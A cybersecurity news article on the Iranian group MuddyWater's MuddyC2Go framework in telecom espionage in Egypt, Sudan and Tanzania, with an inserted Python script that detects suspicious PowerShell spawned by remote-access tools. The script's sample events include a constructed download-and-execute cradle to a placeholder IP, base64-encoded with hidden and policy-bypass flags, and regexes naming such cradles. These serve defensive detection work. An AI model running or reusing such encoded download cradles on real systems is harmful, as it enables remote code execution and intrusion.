Iranian hackers use MuddyC2Go in telecom espionage attacks across Africa

The Iranian nation-state actor known as MuddyWater has used a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan and Tanzania.

The Symantec Threat Hunter Team, part of Broadcom, tracks the activity under the name Seedworm. The same group is also tracked under the names Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros and Yellow Nix.

MuddyWater has been operating since at least 2017 and is believed to have ties to Iran’s Ministry of Intelligence and Security (MOIS), mainly singling out entities in the Middle East.

The cyber espionage group's use of MuddyC2Go was first highlighted last month by Deep Instinct, which described it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there are indications that it may have been in use as early as 2020.

While the full extent of MuddyC2Go's capabilities is not yet known, the executable is equipped with a PowerShell script that automatically connects to Seedworm's C2 server. This gives the attackers remote access to the victim system without an operator having to execute anything manually on the host.

The latest series of intrusions, which took place in November 2023, was also found to rely on SimpleHelp and Venom Proxy, in addition to a custom keylogger and other publicly available tools.

The attack chains established by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.

The attacks on an unnamed telecommunications organization documented by Symantec used the MuddyC2Go launcher to contact an actor-controlled server, while also deploying legitimate remote access software such as AnyDesk and SimpleHelp.

The entity is said to have been compromised by the adversary earlier in 2023, when SimpleHelp was used to launch PowerShell, deliver proxy software and install the JumpCloud remote access tool.

"At another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure," Symantec said. "A customized version of the Venom Proxy hacking tool was also run on this network, as well as the new custom keylogger used by the attackers in this activity."

By combining customized, native and publicly available tools in its attack chains, the group aims to evade detection for as long as possible while pursuing its strategic objectives, the company said.

“The group continues to innovate and evolve its toolset as needed to keep its operations under the radar,” concluded Symantec. “The group continues to make heavy use of PowerShell and PowerShell-related tools and scripts, underscoring the need for organizations to be aware of suspicious PowerShell use on their networks.”
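The tradecraft described above (PowerShell launched from legitimate remote-access software such as SimpleHelp or AnyDesk, encoded command lines, download cradles) lends itself to a simple process-creation detection. The script below is an added example written for this page, not code from Symantec or from the MuddyC2Go tooling. The log events are constructed, the `203.0.113.5` address is a documentation range, the SimpleHelp parent-process name is a placeholder (only `AnyDesk.exe` is the real client binary) and the rule names and scoring are the author's own choices; tune the parent list to the binaries actually deployed in your environment.

```python
import base64
import re
from typing import Optional

# Parent images that should rarely launch PowerShell. AnyDesk.exe is the real
# client binary; the SimpleHelp entry is an assumed placeholder name.
REMOTE_ACCESS_PARENTS = {
    "anydesk.exe",
    "simplehelp-remote-access.exe",  # placeholder, not the vendor's real binary name
}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# (tag, regex) pairs applied to the raw command line plus the decoded payload.
RULES = [
    ("encoded_command", ENCODED_ARG),
    ("download_cradle", re.compile(
        r"(?i)net\.webclient|downloadstring|downloadfile|invoke-webrequest|"
        r"\biwr\b|invoke-restmethod|start-bitstransfer")),
    ("invoke_expression", re.compile(r"(?i)\biex\b|invoke-expression")),
    ("hidden_or_bypass", re.compile(
        r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(?:p|xecutionpolicy)\s+bypass")),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record: dict) -> list:
    """Return the list of rule tags that fire for one process-creation event."""
    image = record["image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return []
    tags = []
    parent = record["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in REMOTE_ACCESS_PARENTS:
        tags.append("spawned_by_remote_access_tool")
    cmdline = record["command_line"]
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    for tag, rx in RULES:
        if rx.search(haystack):
            tags.append(tag)
    return tags


def severity(tags: list) -> str:
    # A remote-access parent, or an encoded download cradle, is enough on its own.
    if "spawned_by_remote_access_tool" in tags or {"encoded_command", "download_cradle"} <= set(tags):
        return "high"
    return "medium" if len(tags) >= 2 else "low"


def scan(records) -> list:
    """Turn a stream of process-creation events into alerts (events with no tags are dropped)."""
    alerts = []
    for r in records:
        tags = analyze(r)
        if tags:
            alerts.append({"host": r["host"], "tags": tags, "severity": severity(tags),
                           "decoded": decode_encoded_command(r["command_line"])})
    return alerts


# Constructed sample events (Sysmon EID 1 / Windows 4688 style fields).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
ENC = base64.b64encode(CRADLE.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "wks-01", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -NoLogo"},
    {"host": "srv-02", "parent_image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "image": PS,
     "command_line": f"powershell.exe -w hidden -nop -enc {ENC}"},
    {"host": "srv-03", "parent_image": r"C:\Program Files\SimpleHelp\simplehelp-remote-access.exe",
     "image": PS, "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\update.ps1"},
    {"host": "srv-04", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe -Command \"Invoke-WebRequest https://updates.example.internal/pkg.zip -OutFile C:\\Temp\\pkg.zip\""},
    {"host": "srv-05", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], ", ".join(alert["tags"]))
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The decoded payload is searched alongside the raw command line so that a download cradle hidden behind `-EncodedCommand` still fires the `download_cradle` rule; the plain `Invoke-WebRequest` run from `svchost.exe` scores only "low", which is the kind of event a triage queue should de-prioritise rather than page on.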

The development comes as an Israel-linked group called Gonjeshke Darande (which means ‘predatory sparrow’ in Persian) claimed responsibility for a cyberattack that disrupted a “majority of gas pumps across Iran” in response to the “aggression of the Islamic Republic and its allies in the region.”

The group, which resurfaced in October 2023 after being silent for almost a year, is believed to be linked to the Israeli Directorate of Military Intelligence and has carried out destructive attacks in Iran against steel facilities, gasoline stations and railway networks.

